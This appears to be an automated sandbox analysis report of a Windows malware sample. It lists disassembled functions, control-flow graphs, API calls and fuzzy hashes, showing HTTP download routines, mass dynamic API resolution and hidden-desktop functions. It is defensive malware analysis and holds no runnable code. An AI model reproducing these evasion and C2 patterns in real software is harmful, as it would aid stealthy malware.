                                    control_flow_graph 2234 a6c40-a6c64 call a2930 2237 a6c66-a6c6b 2234->2237 2238 a6c75-a6c97 call a4bc0 2234->2238 2237->2238 2239 a6c6d-a6c6f lstrcpy 2237->2239 2242 a6caa-a6cba call a2930 2238->2242 2243 a6c99 2238->2243 2239->2238 2247 a6cc8-a6cf5 InternetOpenA StrCmpCA 2242->2247 2248 a6cbc-a6cc2 lstrcpy 2242->2248 2244 a6ca0-a6ca8 2243->2244 2244->2242 2244->2244 2249 a6cfa-a6cfc 2247->2249 2250 a6cf7 2247->2250 2248->2247 2251 a6ea8-a6ebb call a2930 2249->2251 2252 a6d02-a6d22 InternetConnectA 2249->2252 2250->2249 2259 a6ec9-a6ee0 call a2a20 * 2 2251->2259 2260 a6ebd-a6ebf 2251->2260 2253 a6d28-a6d5d HttpOpenRequestA 2252->2253 2254 a6ea1-a6ea2 InternetCloseHandle 2252->2254 2256 a6d63-a6d65 2253->2256 2257 a6e94-a6e9e InternetCloseHandle 2253->2257 2254->2251 2261 a6d7d-a6dad HttpSendRequestA HttpQueryInfoA 2256->2261 2262 a6d67-a6d77 InternetSetOptionA 2256->2262 2257->2254 2260->2259 2263 a6ec1-a6ec3 lstrcpy 2260->2263 2265 a6daf-a6dd3 call c71e0 call a2a20 * 2 2261->2265 2266 a6dd4-a6de4 call c3d90 2261->2266 2262->2261 2263->2259 2266->2265 2275 a6de6-a6de8 2266->2275 2277 a6dee-a6e07 InternetReadFile 2275->2277 2278 a6e8d-a6e8e InternetCloseHandle 2275->2278 2277->2278 2280 a6e0d 2277->2280 2278->2257 2282 a6e10-a6e15 2280->2282 2282->2278 2283 a6e17-a6e3d call c7310 2282->2283 2286 a6e3f call a2a20 2283->2286 2287 a6e44-a6e51 call a2930 2283->2287 2286->2287 2291 a6e53-a6e57 2287->2291 2292 a6e61-a6e8b call a2a20 InternetReadFile 2287->2292 2291->2292 2293 a6e59-a6e5b lstrcpy 2291->2293 2292->2278 2292->2282 2293->2292
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A6C6F
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A6CC2
                                    • InternetOpenA.WININET(000CCFEC,00000001,00000000,00000000,00000000), ref: 000A6CD5
                                    • StrCmpCA.SHLWAPI(?,00E6E578), ref: 000A6CED
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000A6D15
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00E6DC00,00000000,00000000,-00400100,00000000), ref: 000A6D50
                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 000A6D77
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000A6D86
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 000A6DA5
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000A6DFF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A6E5B
                                    • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 000A6E7D
                                    • InternetCloseHandle.WININET(00000000), ref: 000A6E8E
                                    • InternetCloseHandle.WININET(?), ref: 000A6E98
                                    • InternetCloseHandle.WININET(00000000), ref: 000A6EA2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A6EC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                    • String ID: ERROR$GET$x
                                    • API String ID: 3687753495-2288421319
                                    • Opcode ID: 7c492fc9ab4a5d062e1c8924f4c9888fe71918d6ae7a61f86a50f1874b44606b
                                    • Instruction ID: c238120c21eb738ca3e7816a69a2132c7df5846b42d97ccc976ae94b71dd514b
                                    • Opcode Fuzzy Hash: 7c492fc9ab4a5d062e1c8924f4c9888fe71918d6ae7a61f86a50f1874b44606b
                                    • Instruction Fuzzy Hash: E5818B71E01215ABEB20DFA8EC49FEE77B8AF45700F044029F909EB291DB70AD458B90
                                    Function 000A4A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2850 a4a60-a4afc RtlAllocateHeap 2867 a4b7a-a4bbe VirtualProtect 2850->2867 2868 a4afe-a4b03 2850->2868 2869 a4b06-a4b78 2868->2869 2869->2867
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000A4AA3
                                    • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 000A4BB0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-3329630956
                                    • Opcode ID: b2cb1437a64c8bb34701213208cf80581da145e0035c79ef5d9d62265ceef663
                                    • Instruction ID: 331cb718d563e7567ac584f23cbf634beb7a029a4c4f7c1bccf972a5924f4e16
                                    • Opcode Fuzzy Hash: b2cb1437a64c8bb34701213208cf80581da145e0035c79ef5d9d62265ceef663
                                    • Instruction Fuzzy Hash: DE31D428B8232C779620EBEF4C67F5FAE55DFC5B60B02407776A85B380C9B15501CAB2
                                    Function 000C2A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 000C2A6F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C2A76
                                    • GetUserNameA.ADVAPI32(00000000,00000104), ref: 000C2A8A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: f0752c8b5b9763517ae838c463449ac1eed768f29c1d53225a83f3d8591ce99f
                                    • Instruction ID: eb6027bc57cb1ade01783d6b929ef35c9de93beeaabfd71fa3742bc214bf3933
                                    • Opcode Fuzzy Hash: f0752c8b5b9763517ae838c463449ac1eed768f29c1d53225a83f3d8591ce99f
                                    • Instruction Fuzzy Hash: F5F0B4B2E41248AFC700DF88ED49F9EBBBCF705B21F000216FA15E3680D774190486A1
                                    Function 000C66E0 Relevance: 242.2, APIs: 115, Strings: 23, Instructions: 696libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 c66e0-c66e7 634 c66ed-c6af9 GetProcAddress * 43 633->634 635 c6afe-c6b92 LoadLibraryA * 8 633->635 634->635 636 c6c08-c6c0f 635->636 637 c6b94-c6c03 GetProcAddress * 5 635->637 638 c6c15-c6ccd GetProcAddress * 8 636->638 639 c6cd2-c6cd9 636->639 637->636 638->639 640 c6d4f-c6d56 639->640 641 c6cdb-c6d4a GetProcAddress * 5 639->641 642 c6d5c-c6de4 GetProcAddress * 6 640->642 643 c6de9-c6df0 640->643 641->640 642->643 644 c6df6-c6f0b GetProcAddress * 12 643->644 645 c6f10-c6f17 643->645 644->645 646 c6f8d-c6f94 645->646 647 c6f19-c6f88 GetProcAddress * 5 645->647 648 c6f96-c6fbc GetProcAddress * 2 646->648 649 c6fc1-c6fc8 646->649 647->646 648->649 650 c6fca-c6ff0 GetProcAddress * 2 649->650 651 c6ff5-c6ffc 649->651 650->651 652 c70ed-c70f4 651->652 653 c7002-c70e8 GetProcAddress * 10 651->653 654 c70f6-c714d GetProcAddress * 4 652->654 655 c7152-c7159 652->655 653->652 654->655 656 c716e-c7175 655->656 657 c715b-c7169 GetProcAddress 655->657 658 c7177-c71ce GetProcAddress * 4 656->658 659 c71d3 656->659 657->656 658->659
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,00E563A0), ref: 000C66F5
                                    • GetProcAddress.KERNEL32(75900000,00E56640), ref: 000C670D
                                    • GetProcAddress.KERNEL32(75900000,00E68C10), ref: 000C6726
                                    • GetProcAddress.KERNEL32(75900000,00E68D18), ref: 000C673E
                                    • GetProcAddress.KERNEL32(75900000,00E6CF68), ref: 000C6756
                                    • GetProcAddress.KERNEL32(75900000,00E6CFC8), ref: 000C676F
                                    • GetProcAddress.KERNEL32(75900000,00E5B5B8), ref: 000C6787
                                    • GetProcAddress.KERNEL32(75900000,00E6CF80), ref: 000C679F
                                    • GetProcAddress.KERNEL32(75900000,00E6D040), ref: 000C67B8
                                    • GetProcAddress.KERNEL32(75900000,00E6CF20), ref: 000C67D0
                                    • GetProcAddress.KERNEL32(75900000,00E6D070), ref: 000C67E8
                                    • GetProcAddress.KERNEL32(75900000,00E565C0), ref: 000C6801
                                    • GetProcAddress.KERNEL32(75900000,00E56340), ref: 000C6819
                                    • GetProcAddress.KERNEL32(75900000,00E56660), ref: 000C6831
                                    • GetProcAddress.KERNEL32(75900000,00E56600), ref: 000C684A
                                    • GetProcAddress.KERNEL32(75900000,00E6CF98), ref: 000C6862
                                    • GetProcAddress.KERNEL32(75900000,00E6D058), ref: 000C687A
                                    • GetProcAddress.KERNEL32(75900000,00E5B428), ref: 000C6893
                                    • GetProcAddress.KERNEL32(75900000,00E56360), ref: 000C68AB
                                    • GetProcAddress.KERNEL32(75900000,00E6CFE0), ref: 000C68C3
                                    • GetProcAddress.KERNEL32(75900000,00E6D010), ref: 000C68DC
                                    • GetProcAddress.KERNEL32(75900000,00E6D0B8), ref: 000C68F4
                                    • GetProcAddress.KERNEL32(75900000,00E6CF50), ref: 000C690C
                                    • GetProcAddress.KERNEL32(75900000,00E56380), ref: 000C6925
                                    • GetProcAddress.KERNEL32(75900000,00E6D088), ref: 000C693D
                                    • GetProcAddress.KERNEL32(75900000,00E6CFB0), ref: 000C6955
                                    • GetProcAddress.KERNEL32(75900000,00E6D0D0), ref: 000C696E
                                    • GetProcAddress.KERNEL32(75900000,00E6D0A0), ref: 000C6986
                                    • GetProcAddress.KERNEL32(75900000,00E6CFF8), ref: 000C699E
                                    • GetProcAddress.KERNEL32(75900000,00E6CF38), ref: 000C69B7
                                    • GetProcAddress.KERNEL32(75900000,00E6D028), ref: 000C69CF
                                    • GetProcAddress.KERNEL32(75900000,00E6C9F8), ref: 000C69E7
                                    • GetProcAddress.KERNEL32(75900000,00E6CAB8), ref: 000C6A00
                                    • GetProcAddress.KERNEL32(75900000,00E69D48), ref: 000C6A18
                                    • GetProcAddress.KERNEL32(75900000,00E6C920), ref: 000C6A30
                                    • GetProcAddress.KERNEL32(75900000,00E6CAD0), ref: 000C6A49
                                    • GetProcAddress.KERNEL32(75900000,00E563C0), ref: 000C6A61
                                    • GetProcAddress.KERNEL32(75900000,00E6CA10), ref: 000C6A79
                                    • GetProcAddress.KERNEL32(75900000,00E563E0), ref: 000C6A92
                                    • GetProcAddress.KERNEL32(75900000,00E6CB48), ref: 000C6AAA
                                    • GetProcAddress.KERNEL32(75900000,00E6CB30), ref: 000C6AC2
                                    • GetProcAddress.KERNEL32(75900000,00E56440), ref: 000C6ADB
                                    • GetProcAddress.KERNEL32(75900000,00E56460), ref: 000C6AF3
                                    • LoadLibraryA.KERNEL32(00E6CAE8,000C051F), ref: 000C6B05
                                    • LoadLibraryA.KERNEL32(00E6C998), ref: 000C6B16
                                    • LoadLibraryA.KERNEL32(00E6CB60), ref: 000C6B28
                                    • LoadLibraryA.KERNEL32(00E6C9B0), ref: 000C6B3A
                                    • LoadLibraryA.KERNEL32(00E6CB00), ref: 000C6B4B
                                    • LoadLibraryA.KERNEL32(00E6C968), ref: 000C6B5D
                                    • LoadLibraryA.KERNEL32(00E6CA28), ref: 000C6B6F
                                    • LoadLibraryA.KERNEL32(00E6CA40), ref: 000C6B80
                                    • GetProcAddress.KERNEL32(75FD0000,00E56860), ref: 000C6B9C
                                    • GetProcAddress.KERNEL32(75FD0000,00E6C9C8), ref: 000C6BB4
                                    • GetProcAddress.KERNEL32(75FD0000,00E68AF0), ref: 000C6BCD
                                    • GetProcAddress.KERNEL32(75FD0000,00E6CA58), ref: 000C6BE5
                                    • GetProcAddress.KERNEL32(75FD0000,00E56780), ref: 000C6BFD
                                    • GetProcAddress.KERNEL32(734B0000,00E5AE88), ref: 000C6C1D
                                    • GetProcAddress.KERNEL32(734B0000,00E56900), ref: 000C6C35
                                    • GetProcAddress.KERNEL32(734B0000,00E5B1A8), ref: 000C6C4E
                                    • GetProcAddress.KERNEL32(734B0000,00E6CB78), ref: 000C6C66
                                    • GetProcAddress.KERNEL32(734B0000,00E6CB18), ref: 000C6C7E
                                    • GetProcAddress.KERNEL32(734B0000,00E56A20), ref: 000C6C97
                                    • GetProcAddress.KERNEL32(734B0000,00E56940), ref: 000C6CAF
                                    • GetProcAddress.KERNEL32(734B0000,00E6CA88), ref: 000C6CC7
                                    • GetProcAddress.KERNEL32(763B0000,00E567C0), ref: 000C6CE3
                                    • GetProcAddress.KERNEL32(763B0000,00E568A0), ref: 000C6CFB
                                    • GetProcAddress.KERNEL32(763B0000,00E6CA70), ref: 000C6D14
                                    • GetProcAddress.KERNEL32(763B0000,00E6CB90), ref: 000C6D2C
                                    • GetProcAddress.KERNEL32(763B0000,00E56820), ref: 000C6D44
                                    • GetProcAddress.KERNEL32(750F0000,00E5B360), ref: 000C6D64
                                    • GetProcAddress.KERNEL32(750F0000,00E5B270), ref: 000C6D7C
                                    • GetProcAddress.KERNEL32(750F0000,00E6CAA0), ref: 000C6D95
                                    • GetProcAddress.KERNEL32(750F0000,00E56960), ref: 000C6DAD
                                    • GetProcAddress.KERNEL32(750F0000,00E567E0), ref: 000C6DC5
                                    • GetProcAddress.KERNEL32(750F0000,00E5AFC8), ref: 000C6DDE
                                    • GetProcAddress.KERNEL32(75A50000,00E6CBA8), ref: 000C6DFE
                                    • GetProcAddress.KERNEL32(75A50000,00E56800), ref: 000C6E16
                                    • GetProcAddress.KERNEL32(75A50000,00E689F0), ref: 000C6E2F
                                    • GetProcAddress.KERNEL32(75A50000,00E6CBC0), ref: 000C6E47
                                    • GetProcAddress.KERNEL32(75A50000,00E6CBF0), ref: 000C6E5F
                                    • GetProcAddress.KERNEL32(75A50000,00E56840), ref: 000C6E78
                                    • GetProcAddress.KERNEL32(75A50000,00E56880), ref: 000C6E90
                                    • GetProcAddress.KERNEL32(75A50000,00E6CBD8), ref: 000C6EA8
                                    • GetProcAddress.KERNEL32(75A50000,00E6C980), ref: 000C6EC1
                                    • GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 000C6ED7
                                    • GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 000C6EEE
                                    • GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 000C6F05
                                    • GetProcAddress.KERNEL32(75070000,00E568C0), ref: 000C6F21
                                    • GetProcAddress.KERNEL32(75070000,00E6C9E0), ref: 000C6F39
                                    • GetProcAddress.KERNEL32(75070000,00E6CC08), ref: 000C6F52
                                    • GetProcAddress.KERNEL32(75070000,00E6C938), ref: 000C6F6A
                                    • GetProcAddress.KERNEL32(75070000,00E6C950), ref: 000C6F82
                                    • GetProcAddress.KERNEL32(74E50000,00E568E0), ref: 000C6F9E
                                    • GetProcAddress.KERNEL32(74E50000,00E56920), ref: 000C6FB6
                                    • GetProcAddress.KERNEL32(75320000,00E56980), ref: 000C6FD2
                                    • GetProcAddress.KERNEL32(75320000,00E6CE90), ref: 000C6FEA
                                    • GetProcAddress.KERNEL32(6F030000,00E56760), ref: 000C700A
                                    • GetProcAddress.KERNEL32(6F030000,00E569E0), ref: 000C7022
                                    • GetProcAddress.KERNEL32(6F030000,00E567A0), ref: 000C703B
                                    • GetProcAddress.KERNEL32(6F030000,00E6CC50), ref: 000C7053
                                    • GetProcAddress.KERNEL32(6F030000,00E569A0), ref: 000C706B
                                    • GetProcAddress.KERNEL32(6F030000,00E566A0), ref: 000C7084
                                    • GetProcAddress.KERNEL32(6F030000,00E569C0), ref: 000C709C
                                    • GetProcAddress.KERNEL32(6F030000,00E56A00), ref: 000C70B4
                                    • GetProcAddress.KERNEL32(6F030000,InternetSetOptionA), ref: 000C70CB
                                    • GetProcAddress.KERNEL32(6F030000,HttpQueryInfoA), ref: 000C70E2
                                    • GetProcAddress.KERNEL32(74E00000,00E6CED8), ref: 000C70FE
                                    • GetProcAddress.KERNEL32(74E00000,00E68B90), ref: 000C7116
                                    • GetProcAddress.KERNEL32(74E00000,00E6CE30), ref: 000C712F
                                    • GetProcAddress.KERNEL32(74E00000,00E6CEA8), ref: 000C7147
                                    • GetProcAddress.KERNEL32(74DF0000,00E56680), ref: 000C7163
                                    • GetProcAddress.KERNEL32(6CF00000,00E6CEC0), ref: 000C717F
                                    • GetProcAddress.KERNEL32(6CF00000,00E566C0), ref: 000C7197
                                    • GetProcAddress.KERNEL32(6CF00000,00E6CC38), ref: 000C71B0
                                    • GetProcAddress.KERNEL32(6CF00000,00E6CC80), ref: 000C71C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: h$ i$ j$@c$@d$@f$@h$@i$CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA$`c$`d$`f$`g$`h$`i$c$g$h$i
                                    • API String ID: 2238633743-3015402725
                                    • Opcode ID: 880409e1c1f4ddf7c71a30a1b8238bd5152f0efba67e1fffc77c408b78e220e5
                                    • Instruction ID: f350f83e21ccae0cbdb54e7161b05b1ce8945bc97ddeec7c1e5b8c31f3fc34fc
                                    • Opcode Fuzzy Hash: 880409e1c1f4ddf7c71a30a1b8238bd5152f0efba67e1fffc77c408b78e220e5
                                    • Instruction Fuzzy Hash: 5E621AB5E12200AFD754DF65FC8CA2637BAF788602354891BF956D3764EA34AC80DF60
                                    Function 000BF1B0 Relevance: 104.4, APIs: 57, Strings: 2, Instructions: 1156stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000BF1D5
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BF1F1
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000BF1FC
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BF215
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000BF220
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BF239
                                    • lstrcpy.KERNEL32(00000000,000D4FA0), ref: 000BF25E
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BF28C
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BF2C0
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BF2F0
                                    • lstrlen.KERNEL32(00E56520), ref: 000BF315
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: e$ERROR
                                    • API String ID: 367037083-2176359330
                                    • Opcode ID: 605d44c6f9e5e96e830a15971abfc7042030810dda6d56869c9f902249992099
                                    • Instruction ID: 32ba5474bb28bc4131c90ab8bd2f787a3172dffd59d48a3cc33d510d281d8b74
                                    • Opcode Fuzzy Hash: 605d44c6f9e5e96e830a15971abfc7042030810dda6d56869c9f902249992099
                                    • Instruction Fuzzy Hash: 6EA24F70E012069FDB60DF69DD48AAABBF5AF45714F18807AE849DB362EB31DC41CB50
                                    Function 000BFFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C0013
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000C00BD
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C00E1
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000C00EC
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C0110
